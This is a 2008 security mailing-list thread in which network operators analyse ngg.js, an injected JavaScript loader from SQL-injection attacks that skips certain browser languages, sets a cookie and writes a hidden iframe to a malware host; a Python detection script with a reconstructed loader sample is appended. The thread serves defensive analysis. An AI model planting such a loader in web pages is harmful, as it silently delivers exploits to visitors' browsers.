[nsp-sec] Nasty fast-fluxed sites containing javascriptmalcode [FICORA #183472]
Smith, Donald
Donald.Smith at qwest.com
Fri Jul 11 16:27:18 EDT 2008
At least some of the SQL injections have avoided victims in China.
If the comments I extracted are real, it is due to their love of country
(China).
http://isc.sans.org/diary.html?date=2008-05-14
The site has already been mentioned multiple times (www.ririwow.cn,
which appears to be finally taken down). The majority of attacks
actually pointed to this site which happily served some exploits to the
end user. However, this time the main index.htm file had this text
appended at the bottom:
"This is a mass invasion. Safeguard the motherland's dignity!
F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276 at 163.com "
I am not faulting any country. This could have been a foreigner trying
to stir up something.
If you look here you will see that email address was used to register
domains that were used to deliver exploits.
http://www.thinkdigit.com/forum/archive/index.php/t-88452.html
:"The invasion can not control bulk!!!!If the wrong target. Please
forgive! Sorry if you are a hacker. send email to kiss117276 at 163.com my
name is lonely-shadow TALK WITH ME! china is great! f**k france! f**k
CNN! f**k ! HACKER have matherland!"
Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com giac
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Alan
> Sent: Friday, July 11, 2008 3:07 AM
> To: 'Huopio Kauto'; nsp-security at puck.nether.net
> Subject: Re: [nsp-sec] Nasty fast-fluxed sites containing
> javascriptmalcode [FICORA #183472]
>
> ----------- nsp-security Confidential --------
>
> Ngg.js according to the code
> ________________________________________
> window.status="";
> n=navigator.userLanguage.toUpperCase();
> if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")
> &&(n!="ZH")&&(
> n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
> var cookieString = document.cookie;
> var start = cookieString.indexOf("updngg=");
> if (start != -1){}else{
> var expires = new Date();
> expires.setTime(expires.getTime()+11*3600*1000);
> document.cookie = "updngg=update;expires="+expires.toGMTString();
> try{
> document.write("<iframe src=http://destbnp.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
> }
> catch(e)
> {
> };
> }}
>
> ________________________________________
>
> 1. Not vulnerable to CN, TW, RU, KO...
> 2. Other countries will go into the if statement and read the cookie
> value "updngg"; if it exists, it will do nothing. (It only affects
> first-time browsing users, and the cookie period is 11 hr.)
> We think this is to prevent analysis or is some trigger condition.
> 3. If the condition is met, it will connect to the malicious iframe link.
>
> And we think these hackers don't want to become a global threat, because
> if it does, every security company will try to solve the sites.
> The other possibility is that they have a unique 0day exploit but are
> targeting a specified language version.
> That's why they use language to identify users.
>
>
> Regards,
> Alan Lee
>
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> Huopio Kauto
> Sent: Friday, July 11, 2008 4:13 PM
> To: nsp-security at puck.nether.net
> Subject: [nsp-sec] Nasty fast-fluxed sites containing
> javascript malcode
> [FICORA #183472]
>
> ----------- nsp-security Confidential --------
>
> Hi folks,
>
> The following URLs relate to a javascript that we found
> on a Finnish website. Very fresh domain registrations
> and heavily fast-fluxed. Any analysis?
>
> Takedown of the domains and sites etc is more than welcome
>
> > > hxxp://bkpadd.mobi/cgi-bin/index.cgi?ad
> > > hxxp://usaadw.com/cgi-bin/index.cgi?ad
> > > hxxp://drvadw.com/cgi-bin/index.cgi?ad
> > > hxxp://adwnetw.com/cgi-bin/index.cgi?ad
> > > hxxp://loopadd.com/cgi-bin/index.cgi?ad
>
> This seems to be related with SQL injection attacks and
> ngg.js. Just google ngg.js..
>
> --Kauto
>
> Kauto Huopio - kauto.huopio at ficora.fi
> Senior information security adviser
> Finnish Communications Regulatory Authority / CERT-FI
> tel. +358-9-6966772, fax +358-9-6966515, mobile +358-50-5826131
> CERT-FI watch desk daytime: +358-9-6966510
> CERT-FI 24/7 on-call duty officer: +358-44-0120123 /
> http://www.cert.fi
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the
> nsp-security
> community. Confidentiality is essential for effective
> Internet security
> counter-measures.
> _______________________________________________
>
>
>
>
>
This communication is the property of Qwest and may contain confidential or
privileged information. Unauthorized use of this communication is strictly
prohibited and may be unlawful. If you have received this communication
in error, please immediately notify the sender by reply e-mail and destroy
all copies of the communication and any attachments.
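Added example, not part of the thread and not code from any of the posters: a small Python triage script that checks a piece of JavaScript for the three behaviours Alan's analysis of ngg.js describes (a branch on the browser language with an exclusion list, a marker cookie that suppresses repeat delivery, and a document.write() of a zero-size iframe), and reports them together so a web-server operator can sort injected scripts quickly. The two embedded scripts are constructed for the example; the loader sample uses the placeholder domain loader.example.invalid and the cookie name "trk" instead of anything from the thread, and the regexes are a heuristic of my own, not a signature from any product.

```python
import re
from typing import NamedTuple, Optional

# Indicators of a locale-gated iframe loader, following Alan's reading of ngg.js:
#  1. the script branches on the visitor's browser language,
#  2. it sets a marker cookie so the payload is served once per TTL,
#  3. it document.write()s an iframe with zero width and height.
LOCALE_SRC = re.compile(r"navigator\.(?:userLanguage|browserLanguage|systemLanguage|language)\b")
LOCALE_EXCL = re.compile(r"!==?\s*[\"']([A-Za-z]{2}(?:-[A-Za-z]{2,4})?)[\"']")
COOKIE_PROBE = re.compile(r"document\.cookie[\s\S]{0,120}?\.indexOf\(\s*[\"']([^\"'=]+)=")
COOKIE_TTL = re.compile(r"getTime\(\)\s*\+\s*([0-9]+(?:\s*\*\s*[0-9]+)*)")
IFRAME_WRITE = re.compile(r"document\.write\(\s*[\"'](<iframe[^\"']*)", re.IGNORECASE)
IFRAME_SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)
ZERO_DIM = re.compile(r"\b(width|height)\s*=\s*[\"']?0\b", re.IGNORECASE)


class Finding(NamedTuple):
    locale_gated: bool
    excluded_locales: tuple
    cookie_name: Optional[str]
    cookie_ttl_hours: Optional[float]
    hidden_iframe: bool
    iframe_src: Optional[str]

    @property
    def score(self) -> int:
        return int(self.locale_gated) + int(self.cookie_name is not None) + int(self.hidden_iframe)

    @property
    def verdict(self) -> str:
        # A hidden iframe that is gated by locale or by a cookie is the loader
        # pattern; each indicator on its own is common in benign pages.
        if self.hidden_iframe and self.score >= 2:
            return "gated-iframe-loader"
        return "benign-or-inconclusive"


def analyze(js: str) -> Finding:
    """Extract the three indicators from a JavaScript source string."""
    locale_gated = LOCALE_SRC.search(js) is not None
    excluded: tuple = ()
    if locale_gated:
        # Dedupe while keeping order (the ngg.js list repeated "UR").
        excluded = tuple(dict.fromkeys(m.group(1).upper() for m in LOCALE_EXCL.finditer(js)))

    cm = COOKIE_PROBE.search(js)
    cookie_name = cm.group(1) if cm else None

    ttl_hours = None
    tm = COOKIE_TTL.search(js)
    if tm:
        # The expiry is written as a product of integers in milliseconds, e.g. 11*3600*1000.
        ms = 1
        for part in tm.group(1).split("*"):
            ms *= int(part.strip())
        ttl_hours = ms / 3_600_000

    hidden_iframe, iframe_src = False, None
    im = IFRAME_WRITE.search(js)
    if im:
        tag = im.group(1)
        dims = {d.lower() for d in ZERO_DIM.findall(tag)}
        hidden_iframe = {"width", "height"} <= dims
        sm = IFRAME_SRC.search(tag)
        iframe_src = sm.group(1) if sm else None

    return Finding(locale_gated, excluded, cookie_name, ttl_hours, hidden_iframe, iframe_src)


# Constructed loader sample (placeholder domain and cookie name, not from the thread).
SAMPLE_JS = r'''
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="RU")&&(n!="KO")){
var cookieString = document.cookie;
var start = cookieString.indexOf("trk=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "trk=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://loader.example.invalid/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
} catch(e) {}
}}
'''

# Constructed benign sample: a language check and a cookie probe, but no hidden iframe.
BENIGN_JS = r'''
var lang = (navigator.language || "en").toLowerCase();
if (lang != "fi") { document.getElementById("banner").textContent = "Welcome"; }
if (document.cookie.indexOf("consent=") == -1) { showConsentBar(); }
'''

if __name__ == "__main__":
    for label, src in (("constructed loader", SAMPLE_JS), ("constructed benign", BENIGN_JS)):
        f = analyze(src)
        print(f"{label}: {f.verdict} (score {f.score}) {f}")
```

The point of scoring the indicators together rather than alerting on any one of them is that a language switch or a cookie probe is ordinary site code; the combination with a document.write()'d zero-size iframe is what marks the loader, and the extracted iframe source is the URL to pass on for takedown.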